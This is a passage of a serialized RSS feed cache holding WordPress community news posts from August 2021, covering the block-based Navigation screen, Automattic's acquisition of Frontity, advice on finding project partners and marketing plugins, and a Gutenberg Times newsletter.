href=\"https://make.wordpress.org/core/2021/08/13/preliminary-road-to-5-9/\">post</a> outlining the main focus items planned for the block editor in WordPress 5.9.</p>\n\n\n\n<p>&ldquo;A large part of the remaining work is to improve the user experience, reduce complexity, and test as much as possible on themes.&rdquo;</p>\n\n\n\n<p>Contributors participating in the meeting agreed that in order to move the Navigation screen out of the experimental stage, it will need to have UI/UX feature parity with what will soon be the classic Navigation screen (<strong><code>nav-menus.php</code></strong>). Participants came prepared with notes comparing features from the existing Navigation screen to the new block-based one. These are <a href=\"https://docs.google.com/spreadsheets/d/1UB6fMaPmQPGr-xf_R0-P3Mjef_Fhe7UJOBc0dir1GjA/edit#gid=0\">listed in a Google doc</a> with a rough priority assignment.</p>\n\n\n\n<p>Trudging through the many discrepancies between the two Navigation editing experiences allowed the team to update the project&rsquo;s <a href=\"https://github.com/WordPress/gutenberg/issues/29102\">tracking issue</a> on GitHub. It is being reorganized to focus on the tasks required to move the block-based Navigation screen out of &ldquo;experimental&rdquo; status. Nearly two dozen issues have been designated as high priority and 32 are marked as normal.</p>\n\n\n\n<p>Work on the Navigation screen has stalled considerably since it was <a href=\"https://wptavern.com/new-block-based-navigation-and-widgets-screens-sidelined-for-wordpress-5-5\">sidelined from consideration for WordPress 5.5</a> in July 2020. The <a href=\"https://github.com/WordPress/gutenberg/issues/22931\">previous tracking issue</a> for the project became obsolete in February, forcing the creation of <a href=\"https://github.com/WordPress/gutenberg/issues/29102\">a new one</a> that now aggregates all of the priority items for moving block-based Navigation forward. The recorded Hallway Hangout was a transparent discussion about what the UI is lacking and where it needs to go. It was a necessary, albeit tedious, accounting of issues that will get the project back on track.</p>\n\n\n\n<p>The UI is still in a very rough state. Nesting is rudimentary. It&rsquo;s not possible to assign menu locations. Adding menu items between existing items is very difficult, among a number of other critical issues. At this point, it would require an extraordinary effort to extract the block-based Navigation screen from its quagmiry state in order to have it ready for prime time in WordPress 5.9. The release is expected in December 2021 &ndash; just three months away.</p>\n\n\n\n<p>David Smith, who facilitated the meeting, tempered expectations for the block-based Navigation screen with a few clarifications for what it will mean to take the feature out from under the &ldquo;experimental&rdquo; flag:</p>\n\n\n\n<ul><li>We wouldn&rsquo;t commit to feature parity of&nbsp;<em>developer</em>&nbsp;focused APIs at this stage.</li><li>Removing &ldquo;experimental&rdquo; in the Gutenberg&nbsp;<em>plugin</em>, would not automatically make the feature ready for merging into Core (that won&rsquo;t happen until WordPress 5.9&nbsp;<em>at the earliest</em>).</li></ul>\n\n\n\n<p>While the block-based Navigation screen landing in 5.9 doesn&rsquo;t seem likely, contributors&rsquo; recent organizational efforts put them well on their way towards getting the project out from under the &ldquo;experimental&rdquo; flag. Check out the <a href=\"https://make.wordpress.org/core/2021/08/25/hallway-hangout-summary-compare-and-contrast-the-navigation-screens/?mc_cid=c38e4d6475&mc_eid=68ffa9a210\">recorded meeting</a> for a deep dive into the Navigation screen UI and a glimpse of where it&rsquo;s headed.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 01 Sep 2021 04:14:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"WPTavern: Ask the Bartender: How To Find Project Partners?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122065\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"https://wptavern.com/ask-the-bartender-how-to-find-project-partners?utm_source=rss&utm_medium=rss&utm_campaign=ask-the-bartender-how-to-find-project-partners\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5490:\"<blockquote class=\"wp-block-quote\"><p>I was wondering, where should I go if I want to find a developer to work with on an idea? I have an idea for a product. I know the market well, I&rsquo;m part of the target audience, and I just need someone else that would be passionate and interested in the idea just as much as myself to have to agree to work on an open-source project. Tinder for project partners?</p><cite>Derin</cite></blockquote>\n\n\n\n<p class=\"has-drop-cap\">If I am being honest, your question reminds me of my cousin. He is what I call an &ldquo;ideas&rdquo; guy. Every few weeks or so, he calls me up with several new rough concepts of things that could make some money. Most of these conversations end with him asking if I could build him a website or an app. &ldquo;We can split the profits 50/50,&rdquo; he would say. I then tell him that I would rather be paid upfront and show him my rates. He can reap 100% of the profits down the line. He moves on to the next thing.</p>\n\n\n\n<p>As I said, he has loads of ideas. His problem is with the follow-through. Anyone can dream up the perfect product or service. The stumbling blocks tend to be all the steps between concept and production.</p>\n\n\n\n<p>It will be hard to sell any legitimate developer on a dream alone. Feeding, sheltering, and clothing one&rsquo;s family comes first. You must have a way to pay for those things in almost all scenarios.</p>\n\n\n\n<p>I have built projects on nothing but faith with others. Some have worked out. Most have not. Having cash on hand to pay for those months in development will provide a smidgeon of security for the programmer putting in the time to turn a dream into reality.</p>\n\n\n\n<p>One of those projects I completed for my cousin in my younger and less-financially-intelligent days was a hunting and fishing &ldquo;magazine&rdquo; website. It actually saw some early success. The accompanying Facebook group grew to about 1,500 members in the first year or so. The audience was there, but there was no business plan. There were no products or services. No advertising deals. No payday coming for Justin.</p>\n\n\n\n<p>I know 100s of developers who have been in the same boat at one point or another. Most of them wise up after the first project or two that goes nowhere.</p>\n\n\n\n<p>Most dream projects that folks build will be personal itches that they are scratching. If there is no guarantee of a paycheck, it is something they are already passionate about. It sounds like that is the sort of person you want to work with, so you will need to find someone likely already motivated about the same market as you. Without knowing your particular market, it is hard to say where your starting point might be.</p>\n\n\n\n<p>Let us assume your idea is the Next Big Thing. If you need someone on the development end, you should be prepared to take on the other roles to make the project successful. Do you have a business plan? What is your marketing approach? Do you have research that shows there is a market for the idea? Mockups of a potential UI? If you want to pitch someone on coming along for your journey, make sure you have done everything possible to show that it is something worthwhile.</p>\n\n\n\n<p>Where to find that elusive partner, though? It tends to be easier to find open doors when you are involved in the WordPress development community. It is about making connections. That can be through blogging or joining a business-friendly community like <a href=\"https://poststatus.com/\">Post Status</a>. The more involved you are, the more people you can meet who may share your passions or be able to point you to others who do.</p>\n\n\n\n<p>My usual advice would be to visit your local WordCamp to meet others in person. Of course, during this Covid-era, such conferences are virtual. There are tons of online-only <a href=\"https://wptavern.com/category/wordcamps-meetups\">events</a> that can help you connect with people in the community.</p>\n\n\n\n<p>Those human-to-human connections are your foundation, even if they are just over the web.</p>\n\n\n\n<p>I do like the notion of a &ldquo;Tinder&rdquo; for WordPress project partners, or at least some type of networking place for folks. That could be a unique site and service you could build without a developer &mdash; just a domain, hosting plan, and a business model. It could even be the launchpad for finding the partner for your dream project.</p>\n\n\n\n<p>If all else fails, there is always the DIY route &mdash; I am guessing you are not a developer. Many plugin authors have been born from a dream and not a lick of coding knowledge. I started in this industry primarily because I needed my website to have specific functionality. With no money to pay for it, I just started learning. I even enjoyed the art of programming and built a semi-successful business that I ran for over a decade. It is not some magical skill that only a certain few possess. Anyone can pick up the trade with time and effort.</p>\n\n\n\n<p>If you do not have a developer in your corner, that may just need to be one of the hats you must wear as you kick-start your project. Once you start turning a profit, you can hire out that position.</p>\n\n\n\n<p>I have probably not adequately answered your question. The truth is that anything I have ever done with success has started by connecting with others in the WordPress community. So, I am going to kick this can down to our readers. How would you approach finding the right development partner for a great idea?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 31 Aug 2021 23:10:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Automattic Acquires Frontity, Founders to Work Full-Time on Gutenberg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=121918\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:201:\"https://wptavern.com/automattic-acquires-frontity-founders-to-work-full-time-on-gutenberg?utm_source=rss&utm_medium=rss&utm_campaign=automattic-acquires-frontity-founders-to-work-full-time-on-gutenberg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4928:\"<img />Frontity co-founders Pablo Postigo and Luis<br />Herranz\n\n\n\n<p><a href=\"https://automattic.com/\">Automattic</a> has <a href=\"https://frontity.org/blog/frontity-is-joining-automattic/\">acquired Frontity</a>, the company behind an open source framework for building WordPress themes with React. The acquisition comes more than a year after the company <a href=\"https://wptavern.com/frontity-raises-e1m-with-automattic-and-k-fund\">raised &euro;1M in funding</a> in a round led by&nbsp;<a href=\"https://kfund.co/\">K Fund</a>, with Automattic covering 22%. Frontity co-founders Pablo Postigo and Luis Herranz and their team will no longer be developing and maintaining the framework. Their new focus will be on contributing to the WordPress open source project and improving the full site editing developer experience.</p>\n\n\n\n<p>&ldquo;After a series of conversations, Automattic offered to sponsor our team to work directly on the WordPress open source project,&rdquo; Frontity&rsquo;s founders said in the announcement. &ldquo;In particular, to contribute our expertise in developer experience, frontend tooling, performance, and UX to the WordPress core itself, instead of doing so only for an external tool.&rdquo;</p>\n\n\n\n<p>In a separate <a href=\"https://frontity.org/frontity-automattic-qa/\">FAQ document</a>, Frontity clarified that this acquisition does not mean the framework will be merged into WordPress, nor does it mean the team plans to bring React into the WordPress PHP or full site editing themes. The founders intend to apply their expertise to the Gutenberg project full time: </p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Even though Frontity is a React framework, it doesn&rsquo;t mean that we are going to push React to the WordPress frontend. We will look at the Gutenberg and full site editing space to identify those areas in which our work could have the most significant impact, and work closely with the WordPress community to help improve its developer experience.</p><p>WordPress is already the best content platform on the web. We want to help it become the best development platform on the web.</p></blockquote>\n\n\n\n<p>In addition to putting the Frontity team on improving developer experience, Automattic is also investing in other ways that expand its support of the Gutenberg project. The company has recently <a href=\"https://twitter.com/sparklingrobots/status/1422299507388125203\">hired a new head of developer relations</a> who is building out a team tasked with improving the developer experience with Gutenberg and full-site editing. Birgit Pauli-Haack is a new member of that team and Automattic is also <a href=\"https://twitter.com/bph/status/1432272585404915713\">sponsoring</a> her curation of the <a href=\"https://twitter.com/gutenbergtimes\">Gutenberg Times</a> publication and the <a href=\"https://podcasts.apple.com/us/podcast/gutenberg-changelog/id1469294475\">Changelog Podcast</a>. </p>\n\n\n\n<h2>Frontity Framework Will Transition to a Community-Led Project</h2>\n\n\n\n<p>As the result of the acquisition and the team&rsquo;s reassignment to working on Gutenberg, Frontity&rsquo;s founders are transitioning the framework to be a community-led project. The team has prepared to leave the project in &ldquo;a stable, bug-free position,&rdquo; with documentation regarding what features they were working on. The framework is used by many companies and agencies, including high profile sites like the <a href=\"https://www.tiktok.com/creators/creator-portal/\">TikTok Creator Portal</a>, popular Catholic news site <a href=\"https://aleteia.org/\">Aleteia</a>, and <a href=\"https://www.diariomotor.com/\">Diariomotor</a>, a popular Spanish automotive publication. </p>\n\n\n\n<p>&ldquo;As far as we know, Automattic is not using Frontity Framework in any of its products,&rdquo; Frontity CEO and co-founder Pablo Postigo said. &ldquo;But we know there are a lot of Automatticians who have been following our progress closely.&nbsp;</p>\n\n\n\n<p>&ldquo;We are aware that WordPress VIP does recommend Frontity for decoupled solutions, too. We are sure our experience and knowledge might be of help for this team as well.&rdquo;</p>\n\n\n\n<p class=\"has-text-align-center text-center\">The departure of Frontity&rsquo;s founders and team introduces some uncertainty into the future of the framework. When asked if it can survive as a community-led project, Postigo was optimistic but not certain.</p>\n\n\n\n<p>&ldquo;We still think that Frontity Framework is the best way to run a decoupled WordPress site with React and that this will be the case for a long time,&rdquo; Postigo said. </p>\n\n\n\n<p>&ldquo;It is still too early to know what will happen. Frontity has a great community behind it, there are a lot of great projects which are using the framework in production, and there&rsquo;s also a nice group of really active contributors. We feel really positive about the future of the framework.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 31 Aug 2021 00:47:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Announce Your Plugin to the World, Shout It From the Rooftop\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=114661\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:183:\"https://wptavern.com/announce-your-plugin-to-the-world-shout-it-from-the-rooftop?utm_source=rss&utm_medium=rss&utm_campaign=announce-your-plugin-to-the-world-shout-it-from-the-rooftop\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6075:\"<p class=\"has-drop-cap\">The easiest way to kill your WordPress plugin is to fail to let the world know about it. If you cannot manage a tweet, blog post, or quick note on Facebook, you may as well sign the death certificate then and there.</p>\n\n\n\n<p>I get it. I have been there. Not everyone is a marketing guru, so putting out the right messaging might seem like speaking in a foreign language. But no messaging at all? That will not bode well for your young project.</p>\n\n\n\n<p>Part of my job is finding plugins and sharing them with the community. Every week, I am on the lookout for that next great idea. Or, at least, a sort-of-good idea. I scour Twitter, regular blogs that I read, and official WordPress directories for plugins and themes. What I like most about writing about our beloved platform is not big business deals or the latest drama. While those pieces can be fun, I am most interested in what people create on top of the software. Whether a large company or an individual builds a new plugin, I am always excited when Monday rolls around. I can begin my search anew.</p>\n\n\n\n<p>Often, I will find a new plugin that looks promising, so I dive into it. I install and activate it. At times, I find something so interesting that I have no choice but to share it. However, most of the time, I need a little push. To understand &ldquo;the why&rdquo; behind it. I do a quick check to see if they have written a blog post, tweeted about it, or shared it in some way. More often than not, nothing exists about it other than its listing in the plugin directory. And, reaching out to devs via email is often a hit-or-miss affair.</p>\n\n\n\n<p>When you do not announce your new project to the world, it feels like you are not passionate about it.</p>\n\n\n\n<p>I understand that some people simply hash out an idea and decide to drop it in the plugin directory. They are not in it for glory or even recognition. For them, it is just a piece of code they thought might come in hand for others. But, usage is the lifeblood of software. If no one else downloads, installs, and activates your plugin, can we really call it software?</p>\n\n\n\n<p>Like the proverbial tree falling in the forest, whether it makes a sound is irrelevant if no one is around to hear it.</p>\n\n\n\n<p>I have been mulling over whether to finishing writing this post for months, unsure if I was ever going to hit the publish button. I initially scratched down some notes in early April, attempting to understand why so few go through the <em>trouble</em> of doing any marketing of their plugins. I reached out to Bridget Willard to get insight from someone with a rich history in the marketing world. She had just published <em><a href=\"https://bridgetwillard.com/how-to-market-your-plugin/\">How To Market Your Plugin</a></em> the month before, so the timing made sense.</p>\n\n\n\n<p>However, I still felt too frustrated with the status quo in the WordPress community. A message from a reader wishing that we would mention alternative choices for plugin-related posts prompted me to revisit this. The truth is simple. So many projects fly under the radar because their authors begin and end their marketing by submitting to WordPress.org.</p>\n\n\n\n<p>&ldquo;Marketing is communication,&rdquo; said Willard. &ldquo;At the basic level, you must &lsquo;tell people&rsquo; you have a product. The basic minimum is a blog post with social posts on Twitter, Facebook, and LinkedIn. It&rsquo;s scary to market while you build, but that&rsquo;s what the automobile industry does (along with others). You have to create the desire for the product &mdash; more than fixing a problem.&rdquo;</p>\n\n\n\n<p>While she tends to focus on products and services, I asked her what developers should be doing regardless of whether their plugins are commercial or free.</p>\n\n\n\n<p>&ldquo;I advocate with all of my being having a landing page on your main site (not a new site) promoting your plugin &mdash; while you&rsquo;re building it,&rdquo; paraphrasing from a chapter in her book. &ldquo;Take signups for beta testers, start email marketing. The blog post is anti-climatic in many ways, and one or two tweets aren&rsquo;t enough. Even better is to customize the sign-up &lsquo;thank you page&rsquo; with something special &mdash; a video talking about your goals, for example. It&rsquo;s not the time to have a tutorial or demo. This is about communicating your vision.</p>\n\n\n\n<p>&ldquo;The sad thing is that many plugin developers don&rsquo;t see the need to spend money on a &lsquo;free&rsquo; plugin. The axiom is true, &lsquo;it takes money to make money.&rsquo; If you want sales, you need marketing. The sale for a free plugin is a download, and those are just as important.&rdquo;</p>\n\n\n\n<p>Part of me missed the old <a href=\"https://weblogtoolscollection.com/\">Weblog Tools Collection</a> era. Every few days, the site would share a post with the latest plugins (themes too) with short descriptions of each. It was an easy win if you had no marketing skills. Developers could submit their new projects, and the team would share them with the community. When I was a young and upcoming developer, it was one of the only ways I knew how to reach folks in the WordPress community aside from pushing stuff from my own blog.</p>\n\n\n\n<p>Today, we have far more avenues for sharing our work via social networking. Of course, the downside is that you have to cut through the noise.</p>\n\n\n\n<p>In the long run, I would like to see an overhaul of the WordPress.org directory, focusing on the discoverability of plugins by feature instead of <em>only</em> popularity. Not all developers are known for their marketing skills. Having a little help from the directory they feed into could make it easier for budding developers to jump from hobby to business.</p>\n\n\n\n<p>Until then, let the world know about your plugin. Even if it seems like you are shouting into the abyss, you may just hear an answer from someone who noticed your passion. If nothing else, <a href=\"https://wptavern.com/contact\">let us know about it</a> here at WP Tavern.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Aug 2021 23:10:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Matt: Frontity to Join Automattic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=54707\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://ma.tt/2021/08/frontity-to-join-automattic/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1135:\"<p>Since Frontity <a href=\"https://docs.frontity.org/getting-started/quick-start-guide\">launched their open source framework</a>, they have been making the integration between React and WordPress easier. Their proven drive and experience with clean technological solutions will benefit our efforts as we continue to make the block and theme APIs a joy to use and WordPress the best development platform on the web.</p>\n\n\n\n<p>The next step in the growth of this relationship is for <a href=\"https://frontity.org/learn/\">Frontity</a> and its team to join <a href=\"https://automattic.com/\">Automattic</a> and contribute to core WordPress.org as part of our commitment to <a href=\"https://wordpress.org/five-for-the-future/pledge/automattic/\">Five for the Future</a>.</p>\n\n\n\n<p>I believe there’s still a lot that we can learn from decoupled systems and we can incorporate those learnings into WordPress itself as we emphasize performance, flexibility, and ease of development. I look forward to Frontity joining WordPress and channeling their efforts into the WordPress APIs, documentation, and Gutenberg’s full-site editing tools.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 Aug 2021 22:09:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:125:\"Gutenberg Times: Theme.json Horizon, Classic Editor plugin extended, Gallery Block Refactor and more – Weekend Edition #182\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=18792\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://gutenbergtimes.com/classic-editor-plugin-weekend-edition-182/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:12859:\"<p>Howdy! </p>\n\n\n\n<p>Greetings from Germany, where the weather is moody and federal election campaigns heat up. As the American rule to avoid politics and religion at dinner table discussions doesn&#8217;t apply, we have lots to talk about with family and friends we haven&#8217;t seen for over two years. You can view my photos, mostly landscapes, on<a href=\"https://www.instagram.com/idx/\"> Instagram.</a></p>\n\n\n\n<p>As mentioned in the last edition, I have fabulous news. </p>\n\n\n\n<p>I am thrilled to announce that on Monday, August 30th, I will start as developer advocate at Automattic. Automattic will also sponsor the Gutenberg Times and the Changelog Podcast.&nbsp;</p>\n\n\n\n<p>To be part of the WordPress developer relations team feels to me like coming home, and I am deeply grateful to Automattic for offering me the position. The best is yet to come for Gutenberg and publishing with blocks. I am elated, to be part of an astonishing team to take the world-wide WordPress community on the next journey.</p>\n\n\n\n<p>Via previous surveys, you shared a considerable amount of great ideas on how to improve the Gutenberg Times, Live Q &amp; As or  Changelog Podcast. Now I will have the resources (= time) to implement some of them. We can hold more Live Q &amp; As covering the topics suggested in the surveys, or invite guests to the podcast. </p>\n\n\n\n\n\n\n<p>Share your ideas or comments via email <a href=\"mailto:pauli@gutenbergtimes.com\">pauli@gutenbergtimes.com</a> or leave a comment below.  I want to read them all! </p>\n\n\n\n\n<p>Now without further ado: There is  a heap of links to share with you, after I skipped a week. </p>\n\n\n\n<p>Yours, ?<br />Birgit </p>\n\n\n\n<h2>Classic Editor plugin extended for one Year</h2>\n\n\n\n<p>The WordPress core committers <a href=\"https://wordpress.org/news/2021/08/an-update-on-the-classic-editor-plugin/\"><strong>officially extended the support for the Classic Editor plugin all through 2022.</strong></a> This gives everyone another year to migrate to blocks.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> also wrote: &#8220;Still, if you’ve been putting off using the block editor, this is an excellent time to give it another shot. Since it first appeared in 2018, hundreds of WordPress contributors have made a lot of updates based on user feedback. You will be pleasantly surprised at how far it’s come!”</p>\n\n\n\n<p><a href=\"https://wptavern.com/wordpress-classic-editor-support-extended-for-at-least-another-year\">On the WordPress Tavern</a>, <strong>Justin Tadlock</strong> interviewed, core committer, Jonathan Derosiers and has more details on the core team&#8217;s approach toward maintaining the plugin beyond 2022.</p>\n\n\n\n\n<p><strong>&nbsp;<a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;Keeping up with Gutenberg &#8211; Index 2021&#8221;</a>&nbsp;</strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test and Meta team from Jan. 2021 on. Updated by yours truly.  <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\"><em>The index 2020 is here</em></a></p>\n\n\n\n\n<h2>Gallery Block Refactor landed and needs testing</h2>\n\n\n\n<p>The Gallery block hasn&#8217;t had any significant update since the release in WordPress 5.0. It was clear that a different approach would be needed for the next iteration. <strong>Glen Davies</strong> spearheaded the Refactor of the Gallery block. The main change was to use the <code>InnerBlock</code> feature to create Galleries as collection of single image blocks. </p>\n\n\n\n\n\n<p>This empowers content creators to assign different styles and links to individual images of the Gallery. Although the refactor progressed well, it didn&#8217;t make it into WordPress 5.8 as backwards compatibility with the earlier version and migration for existing gallery blocks needed more attention. </p>\n\n\n\n<p>The code changes made it into the Gutenberg plugin and are available via the Experiments section. You can use the <a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Gutenberg Nightly version</a>, or the <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v11.4.0-rc.1\">11.4 Release Candidate</a>, or wait until Wednesday (Sept 1) for the stable 11.4 release. </p>\n\n\n\n<ul><li><strong>Glen Davies</strong> posted the <a href=\"https://make.wordpress.org/core/2021/08/20/gallery-block-refactor-dev-note/\">Gallery Block Refactor Dev Note</a>. </li><li><strong>Justin Tadlock</strong> shares his experience: <a href=\"https://wptavern.com/gallery-block-refactor-expected-to-land-in-wordpress-5-9\">Gallery Block Refactor Expected To Land in WordPress 5.9</a></li></ul>\n\n\n\n\n<p><strong><a 